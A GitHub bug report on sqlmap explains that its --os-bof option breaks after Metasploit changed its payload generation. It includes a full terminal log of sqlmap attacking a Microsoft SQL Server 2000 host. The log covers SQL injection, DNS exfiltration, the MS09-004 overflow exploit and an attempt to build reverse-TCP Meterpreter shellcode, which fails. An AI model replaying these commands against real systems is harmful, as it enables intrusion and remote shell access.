--os-bof doesn't working due to msf changes #2306

mmetince opened this Issue Dec 15, 2016 · 0 comments


None yet

1 participant


It seems msf has changed their payload generate parameters.

root@root:~# sqlmap -r /tmp/a.txt --dbms MsSQL --technique BS --tamper space2comment -p [SECRET] --dns-domain [SECRET]  --os-bof
 ___ ___[)]_____ ___ ___  {1.0.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 06:14:13

[06:14:13] [INFO] parsing HTTP request from '/tmp/a.txt'
[06:14:13] [INFO] setting up DNS server instance
[06:14:13] [INFO] loading tamper script 'space2comment'
[06:14:13] [WARNING] you did not provide the local path where Metasploit Framework is installed
[06:14:13] [WARNING] sqlmap is going to look for Metasploit Framework installation inside the environment path(s)
[06:14:13] [INFO] Metasploit Framework has been found installed in the '/usr/bin' path
[06:14:14] [WARNING] provided value for parameter 'txtPhone4' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[06:14:14] [INFO] testing connection to the target URL
[06:14:14] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
Parameter: [SECRET] (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: [SECRET]
[06:14:14] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[06:14:14] [INFO] testing Microsoft SQL Server
[06:14:14] [INFO] confirming Microsoft SQL Server
[06:14:14] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, ASP, Microsoft IIS 5.0
back-end DBMS: Microsoft SQL Server 2000
[06:14:14] [INFO] going to exploit the Microsoft SQL Server 2000 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004)
this technique is likely to DoS the DBMS process, are you sure that you want to carry with the exploit? [y/N] y
[06:14:22] [INFO] fingerprinting the back-end DBMS operating system version and service pack
[06:14:22] [INFO] testing for data retrieval through DNS channel
[06:14:23] [INFO] data retrieval through DNS channel was successful
[06:14:23] [WARNING] unable to fingerprint the underlying operating system version, assuming it is Windows 2003 Service Pack 2
[06:14:23] [INFO] creating Metasploit Framework multi-stage shellcode 
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1
what is the local address? [Enter for '[SECRET]' (detected)] 
which local port number do you want to use? [6374] 
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
which payload encoding do you want to use?
[1] No Encoder
[2] Alpha2 Alphanumeric Mixedcase Encoder
[3] Alpha2 Alphanumeric Uppercase Encoder
[4] Avoid UTF8/tolower
[5] Call+4 Dword XOR Encoder
[6] Single-byte XOR Countdown Encoder
[7] Variable-length Fnstenv/mov Dword XOR Encoder
[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
[9] Non-Alpha Encoder
[10] Non-Upper Encoder
[11] Polymorphic XOR Additive Feedback Encoder (default)
[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
> 11
[06:14:36] [INFO] creation in progress ...... done
[06:14:42] [CRITICAL] failed to create the shellcode (No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 336 bytes Final size of exe file: 73802 bytes )
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment